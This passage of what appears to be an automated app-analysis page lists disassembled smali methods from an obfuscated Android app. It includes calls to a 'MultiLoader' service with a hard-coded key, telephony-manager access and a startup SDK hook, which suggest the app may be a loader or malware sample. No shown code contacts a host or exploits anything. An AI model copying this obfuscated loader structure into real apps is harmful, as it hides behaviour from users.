2const-wide/16 v0, 0x0
3new-array v2, v2, [B
4goto_8:
5invoke-virtual {p0, v2}, Ljava/io/InputStream;->read([B)I
6move-result v3
7if-ltz v3, :cond_15
8int-to-long v4, v3
9add-long/2addr v0, v4
10const/4 v4, 0x0
12invoke-virtual {p1, v2, v4, v3}, Ljava/io/OutputStream;->write([BII)V
13goto/16 :goto_8
14cond_15: return-wide v0
APIs
  • android.os.Parcel.writeByte
  • android.os.Parcel.writeInt
Position Instruction Meta Information
1invoke-super {p0, p1, p2}, Lcom/czybg/eqtbdmzpklrgyns/nMWvySG;->writeToParcel(Landroid/os/Parcel;I)V
2iget-boolean v0, p0, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->DiXsQ:Z
3if-eqz v0, :cond_12
4const/4 v0, 0x1
5goto_8: int-to-byte v0, v0
7invoke-virtual {p1, v0}, Landroid/os/Parcel;->writeByte(B)V
8iget v0, p0, Lcom/czybg/eqtbdmzpklrgyns/VsOwEHi;->Odjrct:I
10invoke-virtual {p1, v0}, Landroid/os/Parcel;->writeInt(I)V
11return-void
12cond_12: const/4 v0, 0x0
13goto/16 :goto_8
Cross References
APIs
  • java.lang.Integer.valueOf
  • java.util.concurrent.ConcurrentHashMap.remove
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->xnLvoQ:Ljava/util/concurrent/ConcurrentHashMap;
3invoke-static {p1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
4move-result-object v1
6invoke-virtual {v0, v1}, Ljava/util/concurrent/ConcurrentHashMap;->remove(Ljava/lang/Object;)Ljava/lang/Object;
8iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->EZmcnv:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
10iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->xnLvoQ:Ljava/util/concurrent/ConcurrentHashMap;
12invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ(Ljava/util/Map;)V
13return-void
Cross References
APIs
  • java.lang.Integer.valueOf
  • java.util.concurrent.ConcurrentHashMap.put
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->xnLvoQ:Ljava/util/concurrent/ConcurrentHashMap;
3invoke-static {p1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
4move-result-object v1
6invoke-virtual {v0, v1, p2}, Ljava/util/concurrent/ConcurrentHashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
8iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->EZmcnv:Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
10iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->xnLvoQ:Ljava/util/concurrent/ConcurrentHashMap;
12invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->DiXsQ(Ljava/util/Map;)V
13return-void
Cross References
APIs
  • java.lang.Object.<init>
  • java.lang.System.currentTimeMillis
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
2iput p1, p0, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->DiXsQ:I
3iput-object p2, p0, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->Odjrct:Ljava/lang/String;
4iput-object p3, p0, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->LmcGi:Ljava/lang/String;
5iput-object p4, p0, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->hZyMGHgz:Ljava/lang/String;
6iput-boolean p5, p0, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->xnLvoQ:Z
8invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
9move-result-wide v0
10const-wide/16 v2, 0x3e8
11div-long/2addr v0, v2
12iput-wide v0, p0, Lcom/czybg/eqtbdmzpklrgyns/qaNho;->jVOak:J
13return-void
APIs
  • android.content.Intent.<init>
  • com.czybg.eqtbdmzpklrgyns.BaseActivity.startActivity
Position Instruction Meta Information
0.param p1, "view" # Landroid/view/View;
1.prologue
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/BaseActivity$1;->this$0:Lcom/czybg/eqtbdmzpklrgyns/BaseActivity;
4new-instance v1, Landroid/content/Intent;
6iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/BaseActivity$1;->this$0:Lcom/czybg/eqtbdmzpklrgyns/BaseActivity;
7const-class v3, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity;
9invoke-direct {v1, v2, v3}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
11invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/BaseActivity;->startActivity(Landroid/content/Intent;)V
12return-void
APIs
  • android.content.Intent.<init>
  • com.czybg.eqtbdmzpklrgyns.BaseActivity.startActivity
Position Instruction Meta Information
0.param p1, "view" # Landroid/view/View;
1.prologue
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/BaseActivity$2;->this$0:Lcom/czybg/eqtbdmzpklrgyns/BaseActivity;
4new-instance v1, Landroid/content/Intent;
6iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/BaseActivity$2;->this$0:Lcom/czybg/eqtbdmzpklrgyns/BaseActivity;
7const-class v3, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity;
9invoke-direct {v1, v2, v3}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
11invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/BaseActivity;->startActivity(Landroid/content/Intent;)V
12return-void
Cross References
APIs
  • java.lang.System.arraycopy
Position Instruction Meta Information
0const/4 v3, 0x0
1array-length v0, p0
2array-length v1, p1
3add-int/2addr v0, v1
4new-array v0, v0, [B
5array-length v1, p0
7invoke-static {p0, v3, v0, v3, v1}, Ljava/lang/System;->arraycopy(Ljava/lang/Object;ILjava/lang/Object;II)V
8array-length v1, p0
9array-length v2, p1
11invoke-static {p1, v3, v0, v1, v2}, Ljava/lang/System;->arraycopy(Ljava/lang/Object;ILjava/lang/Object;II)V
12return-object v0
Strings
  • Crashlytics
  • Use of Crashlytics.setPinningInfoProvider is deprecated
Position Instruction Meta Information
0.annotation runtime Ljava/lang/Deprecated;
1.end annotation
3invoke-static {}, Lmpio/fabric/sdk/android/Fabric;->getLogger()Lmpio/fabric/sdk/android/Logger;
4move-result-object v0
6const-string v1, "Crashlytics"
8const-string v2, "Use of Crashlytics.setPinningInfoProvider is deprecated"
10invoke-interface {v0, v1, v2}, Lmpio/fabric/sdk/android/Logger;->w(Ljava/lang/String;Ljava/lang/String;)V
11return-void
APIs
  • java.util.ArrayList.<init>
Position Instruction Meta Information
0const/4 v0, 0x0
1sput v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ:I
2new-instance v0, Ljava/util/ArrayList;
4invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
5sput-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct:Ljava/util/List;
6new-instance v0, Ljava/util/ArrayList;
8invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
9sput-object v0, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->LmcGi:Ljava/util/List;
10return-void
Cross References
APIs
  • android.content.Context.getPackageManager
  • android.content.pm.PackageManager.getPackageInfo
Position Instruction Meta Information
0const/4 v0, 0x1
2invoke-virtual {p1}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
3move-result-object v1
4const/4 v2, 0x1
5try_start_6:
6invoke-virtual {v1, p0, v2}, Landroid/content/pm/PackageManager;->getPackageInfo(Ljava/lang/String;I)Landroid/content/pm/PackageInfo;
7goto_9: return v0
8catch_a: move-exception v0
9const/4 v0, 0x0
10goto/16 :goto_9
APIs
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.MCq9ggDf53Iz0h.stopForeground
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.MCq9ggDf53Iz0h.stopSelf
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/EzgWyUe;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/MCq9ggDf53Iz0h;
2const/4 v1, 0x1
4invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/MCq9ggDf53Iz0h;->stopForeground(Z)V
6iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/EzgWyUe;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/MCq9ggDf53Iz0h;
8invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/MCq9ggDf53Iz0h;->stopSelf()V
9return-void
Cross References
APIs
  • java.lang.Object.<init>
  • com.czybg.eqtbdmzpklrgyns.cXdqo.<init>
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
2iput-object p1, p0, Lcom/czybg/eqtbdmzpklrgyns/NvHUu;->DiXsQ:Landroid/content/Context;
3new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/cXdqo;
5invoke-direct {v0, p2, p3}, Lcom/czybg/eqtbdmzpklrgyns/cXdqo;-><init>(Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;Ljava/io/File;)V
6iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/NvHUu;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/cXdqo;
7iput-object p4, p0, Lcom/czybg/eqtbdmzpklrgyns/NvHUu;->info:Lcom/czybg/eqtbdmzpklrgyns/qaNho;
8return-void
APIs
  • android.animation.AnimatorListenerAdapter.onAnimationEnd
  • java.lang.Runnable.run
Position Instruction Meta Information
0.param p1, "animation" # Landroid/animation/Animator;
1.prologue
3invoke-super {p0, p1}, Landroid/animation/AnimatorListenerAdapter;->onAnimationEnd(Landroid/animation/Animator;)V
5iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/ProgressActivity$3;->val$finishCallback:Ljava/lang/Runnable;
7invoke-interface {v0}, Ljava/lang/Runnable;->run()V
8return-void
Cross References
APIs
  • com.czybg.eqtbdmzpklrgyns.zlSgts.<init>
  • android.os.Parcel.createTypedArrayList
Position Instruction Meta Information
1invoke-direct {p0, p1}, Lcom/czybg/eqtbdmzpklrgyns/zlSgts;-><init>(Landroid/os/Parcel;)V
3sget-object v0, Lcom/czybg/eqtbdmzpklrgyns/XvyLhdxa;->CREATOR:Landroid/os/Parcelable$Creator;
5invoke-virtual {p1, v0}, Landroid/os/Parcel;->createTypedArrayList(Landroid/os/Parcelable$Creator;)Ljava/util/ArrayList;
6move-result-object v0
7iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/bhrmCXSP;->DiXsQ:Ljava/util/ArrayList;
8return-void
Cross References
Strings
  • default
  • szzRas4x
Position Instruction Meta Information
0.prologue
2const-string v0, "default"
4const-string v1, "szzRas4x"
6invoke-static {p0, v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/MultiLoader;->service(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)V
7return-void
Cross References
APIs
  • android.os.Parcel.writeString
  • android.os.Parcel.writeInt
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/nMWvySG;->LmcGi:Ljava/lang/String;
3invoke-virtual {p1, v0}, Landroid/os/Parcel;->writeString(Ljava/lang/String;)V
4iget v0, p0, Lcom/czybg/eqtbdmzpklrgyns/nMWvySG;->hZyMGHgz:I
6invoke-virtual {p1, v0}, Landroid/os/Parcel;->writeInt(I)V
7return-void
APIs
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.MCq9ggDf53Iz0h.stopForeground
  • com.czybg.eqtbdmzpklrgyns.Vdptsq.MCq9ggDf53Iz0h.stopSelf
Position Instruction Meta Information
0const/4 v0, 0x1
2invoke-virtual {p0, v0}, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/MCq9ggDf53Iz0h;->stopForeground(Z)V
4invoke-virtual {p0}, Lcom/czybg/eqtbdmzpklrgyns/Vdptsq/MCq9ggDf53Iz0h;->stopSelf()V
5const/4 v0, 0x2
6return v0
Cross References
APIs
  • java.lang.Object.<init>
  • java.util.ArrayList.<init>
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
2new-instance v0, Ljava/util/ArrayList;
4invoke-direct {v0}, Ljava/util/ArrayList;-><init>()V
5iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/Vmptbl;->DiXsQ:Ljava/util/ArrayList;
6return-void
APIs
  • com.czybg.eqtbdmzpklrgyns.zlSgts.writeToParcel
  • android.os.Parcel.writeTypedList
Position Instruction Meta Information
1invoke-super {p0, p1, p2}, Lcom/czybg/eqtbdmzpklrgyns/zlSgts;->writeToParcel(Landroid/os/Parcel;I)V
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/bhrmCXSP;->DiXsQ:Ljava/util/ArrayList;
5invoke-virtual {p1, v0}, Landroid/os/Parcel;->writeTypedList(Ljava/util/List;)V
6return-void
Cross References
APIs
  • com.czybg.eqtbdmzpklrgyns.zlSgts.<init>
  • android.os.Parcel.createStringArray
Position Instruction Meta Information
1invoke-direct {p0, p1}, Lcom/czybg/eqtbdmzpklrgyns/zlSgts;-><init>(Landroid/os/Parcel;)V
3invoke-virtual {p1}, Landroid/os/Parcel;->createStringArray()[Ljava/lang/String;
4move-result-object v0
5iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jAdeqNK;->DiXsQ:[Ljava/lang/String;
6return-void
APIs
  • com.czybg.eqtbdmzpklrgyns.zlSgts.writeToParcel
  • android.os.Parcel.writeStringArray
Position Instruction Meta Information
1invoke-super {p0, p1, p2}, Lcom/czybg/eqtbdmzpklrgyns/zlSgts;->writeToParcel(Landroid/os/Parcel;I)V
3iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/jAdeqNK;->DiXsQ:[Ljava/lang/String;
5invoke-virtual {p1, v0}, Landroid/os/Parcel;->writeStringArray([Ljava/lang/String;)V
6return-void
Cross References
APIs
  • java.io.File.<init>
  • com.czybg.eqtbdmzpklrgyns.zlSgts.Odjrct
Position Instruction Meta Information
1invoke-direct {p0, p1}, Ljava/io/File;-><init>(Ljava/lang/String;)V
3invoke-static {p1}, Lcom/czybg/eqtbdmzpklrgyns/zlSgts;->Odjrct(Ljava/lang/String;)Ljava/lang/String;
4move-result-object v0
5iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/zlSgts;->Odjrct:Ljava/lang/String;
6return-void
APIs
  • android.app.Application.onCreate
  • com.czybg.eqtbdmzpklrgyns.MainApp.runsdk
Position Instruction Meta Information
0.prologue
2invoke-super {p0}, Landroid/app/Application;->onCreate()V
4invoke-direct {p0}, Lcom/czybg/eqtbdmzpklrgyns/MainApp;->runsdk()V
5return-void
Cross References
APIs
  • java.io.File.getPath
  • com.czybg.eqtbdmzpklrgyns.cXdqo.<init>
Position Instruction Meta Information
1invoke-virtual {p2}, Ljava/io/File;->getPath()Ljava/lang/String;
2move-result-object v0
4invoke-direct {p0, p1, v0}, Lcom/czybg/eqtbdmzpklrgyns/cXdqo;-><init>(Lcom/czybg/eqtbdmzpklrgyns/DiXsQ;Ljava/lang/String;)V
5return-void
Cross References
APIs
  • java.lang.Object.<init>
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
2iput-object p1, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->jVOak:Landroid/content/Context;
3new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;
5invoke-direct {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;-><init>(Landroid/content/Context;)V
6iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;
7new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;
9invoke-direct {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;-><init>(Landroid/content/Context;)V
10iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->CyGFDR:Lcom/czybg/eqtbdmzpklrgyns/LmcGi;
12iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->CyGFDR:Lcom/czybg/eqtbdmzpklrgyns/LmcGi;
14invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->DiXsQ()Landroid/telephony/TelephonyManager;
15move-result-object v0
16iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->EZmcnv:Landroid/telephony/TelephonyManager;
17new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;
19iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->EZmcnv:Landroid/telephony/TelephonyManager;
21iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->CyGFDR:Lcom/czybg/eqtbdmzpklrgyns/LmcGi;
23invoke-direct {v0, p0, p1, v1, v2}, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;-><init>(Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;Landroid/content/Context;Landroid/telephony/TelephonyManager;Lcom/czybg/eqtbdmzpklrgyns/LmcGi;)V
24iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;
25new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;
27iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->EZmcnv:Landroid/telephony/TelephonyManager;
29invoke-direct {v0, p0, v1}, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;-><init>(Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;Landroid/telephony/TelephonyManager;)V
30iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;
31new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;
33const-string v1, ""
35invoke-direct {v0, p1, p2, p3, v1}, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;-><init>(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V
36iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;
38iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;
39const/4 v1, 0x1
40iput-boolean v1, v0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->FySkt:Z
42iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;
43iput-object p4, v0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->hZyMGHgz:Ljava/lang/String;
44if-eqz p5, :cond_47
46iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;
47iput p5, v0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->jVOak:I
48cond_47: return-void
Cross References
APIs
  • java.lang.Object.<init>
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
2iput-object p1, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->jVOak:Landroid/content/Context;
3new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;
5invoke-direct {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;-><init>(Landroid/content/Context;)V
6iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/KQHWJgLX;
7new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;
9invoke-direct {v0, p1}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;-><init>(Landroid/content/Context;)V
10iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->CyGFDR:Lcom/czybg/eqtbdmzpklrgyns/LmcGi;
12iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->CyGFDR:Lcom/czybg/eqtbdmzpklrgyns/LmcGi;
14invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/LmcGi;->DiXsQ()Landroid/telephony/TelephonyManager;
15move-result-object v0
16iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->EZmcnv:Landroid/telephony/TelephonyManager;
17new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;
19iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->EZmcnv:Landroid/telephony/TelephonyManager;
21iget-object v2, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->CyGFDR:Lcom/czybg/eqtbdmzpklrgyns/LmcGi;
23invoke-direct {v0, p0, p1, v1, v2}, Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;-><init>(Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;Landroid/content/Context;Landroid/telephony/TelephonyManager;Lcom/czybg/eqtbdmzpklrgyns/LmcGi;)V
24iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/hrYSUpo;
25new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;
27iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->EZmcnv:Landroid/telephony/TelephonyManager;
29invoke-direct {v0, p0, v1}, Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;-><init>(Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;Landroid/telephony/TelephonyManager;)V
30iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->Odjrct:Lcom/czybg/eqtbdmzpklrgyns/jfIitJ;
31new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;
33const-string v1, ""
35invoke-direct {v0, p1, p2, p3, v1}, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;-><init>(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V
36iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;
38iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/siQFgImL;->LmcGi:Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;
39const/4 v1, 0x1
40iput-boolean v1, v0, Lcom/czybg/eqtbdmzpklrgyns/YRqiaNxB;->FySkt:Z
41return-void
Cross References
APIs
  • java.lang.System.currentTimeMillis
Position Instruction Meta Information
0const-wide/16 v2, 0x0
1iget-wide v0, p0, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;->DiXsQ:J
2cmp-long v0, v0, v2
3if-lez v0, :cond_1f
4iget-wide v0, p0, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;->Odjrct:J
5iget-wide v4, p0, Lcom/czybg/eqtbdmzpklrgyns/phHwgb;->DiXsQ:J
6const-wide/16 v6, 0x3e8
7mul-long/2addr v4, v6
8add-long/2addr v0, v4
10invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
11move-result-wide v4
12sub-long/2addr v0, v4
13cmp-long v4, v0, v2
14if-lez v4, :cond_1f
15goto_19: cmp-long v0, v0, v2
16if-lez v0, :cond_21
17const/4 v0, 0x1
18goto_1e: return v0
19cond_1f: move-wide v0, v2
20goto/16 :goto_19
21cond_21: const/4 v0, 0x0
22goto/16 :goto_1e
APIs
  • android.os.Handler.removeCallbacksAndMessages
Position Instruction Meta Information
0check-cast p1, Lcom/czybg/eqtbdmzpklrgyns/peOiD;
2iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/lVfyLT;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
4iget-object v1, p1, Lcom/czybg/eqtbdmzpklrgyns/peOiD;->DiXsQ:Ljava/util/List;
6invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ(Ljava/util/List;)V
8iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/lVfyLT;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
10iget-object v1, p1, Lcom/czybg/eqtbdmzpklrgyns/peOiD;->Odjrct:Ljava/util/List;
12invoke-virtual {v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->Odjrct(Ljava/util/List;)V
14iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/lVfyLT;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
16invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;->DiXsQ(Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;)Landroid/os/Handler;
17move-result-object v0
18const/4 v1, 0x0
20invoke-virtual {v0, v1}, Landroid/os/Handler;->removeCallbacksAndMessages(Ljava/lang/Object;)V
21return-void
APIs
  • android.os.Handler.postDelayed
Position Instruction Meta Information
1iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KPMIv;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
3invoke-virtual {v0}, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->LmcGi()V
5iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/KPMIv;->DiXsQ:Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;
7iget-object v0, v0, Lcom/czybg/eqtbdmzpklrgyns/WDAcpd;->IwTvjRW:Landroid/os/Handler;
8const-wide/32 v1, 0x3a980
10invoke-virtual {v0, p0, v1, v2}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
11return-void
Cross References
APIs
  • org.json.JSONObject.<init>
Position Instruction Meta Information
0try_start_0: new-instance v0, Lorg/json/JSONObject;
2invoke-direct {v0, p0}, Lorg/json/JSONObject;-><init>(Ljava/lang/String;)V
4invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;->DiXsQ(Lorg/json/JSONObject;)Lcom/czybg/eqtbdmzpklrgyns/LfxjW;
5try_end_8: move-result-object v0
6goto_9: return-object v0
7catch_a: move-exception v0
8new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;
10invoke-direct {v0}, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;-><init>()V
11goto/16 :goto_9
Cross References
APIs
  • java.lang.Object.<init>
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
2new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/Odjrct;
4invoke-direct {v0}, Lcom/czybg/eqtbdmzpklrgyns/Odjrct;-><init>()V
5iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/BtXsH;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/Odjrct;
6iput-object p4, p0, Lcom/czybg/eqtbdmzpklrgyns/BtXsH;->DiXsQ:Ljava/lang/String;
7iput-object p3, p0, Lcom/czybg/eqtbdmzpklrgyns/BtXsH;->Odjrct:Ljava/lang/String;
8iput-object p1, p0, Lcom/czybg/eqtbdmzpklrgyns/BtXsH;->LmcGi:Landroid/content/Context;
9iput-object p2, p0, Lcom/czybg/eqtbdmzpklrgyns/BtXsH;->xnLvoQ:Lcom/czybg/eqtbdmzpklrgyns/uKFQsLn;
10return-void
APIs
  • java.lang.Throwable.printStackTrace
Position Instruction Meta Information
1invoke-virtual {p2}, Ljava/lang/Throwable;->printStackTrace()V
2const-wide/16 v0, 0x1388
4invoke-virtual {p0, v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->DiXsQ(J)V
6iget-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/EvqAMX;
7check-cast p2, Ljava/lang/Exception;
9invoke-interface {v0, p2}, Lcom/czybg/eqtbdmzpklrgyns/EvqAMX;->DiXsQ(Ljava/lang/Exception;)V
10return-void
Cross References
APIs
  • java.lang.Object.<init>
Position Instruction Meta Information
1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
3const-string v0, ""
4iput-object v0, p0, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;->DiXsQ:Ljava/lang/String;
5const/4 v0, 0x0
6iput v0, p0, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;->Odjrct:I
7iput-object p1, p0, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;->DiXsQ:Ljava/lang/String;
8iput p2, p0, Lcom/czybg/eqtbdmzpklrgyns/LfxjW;->Odjrct:I
9return-void
Cross References
APIs
  • android.app.Activity.onDestroy
Position Instruction Meta Information
1invoke-super {p0}, Landroid/app/Activity;->onDestroy()V
2sget-boolean v0, Lcom/czybg/eqtbdmzpklrgyns/YAIwLmyd;->DiXsQ:Z
3if-eqz v0, :cond_e
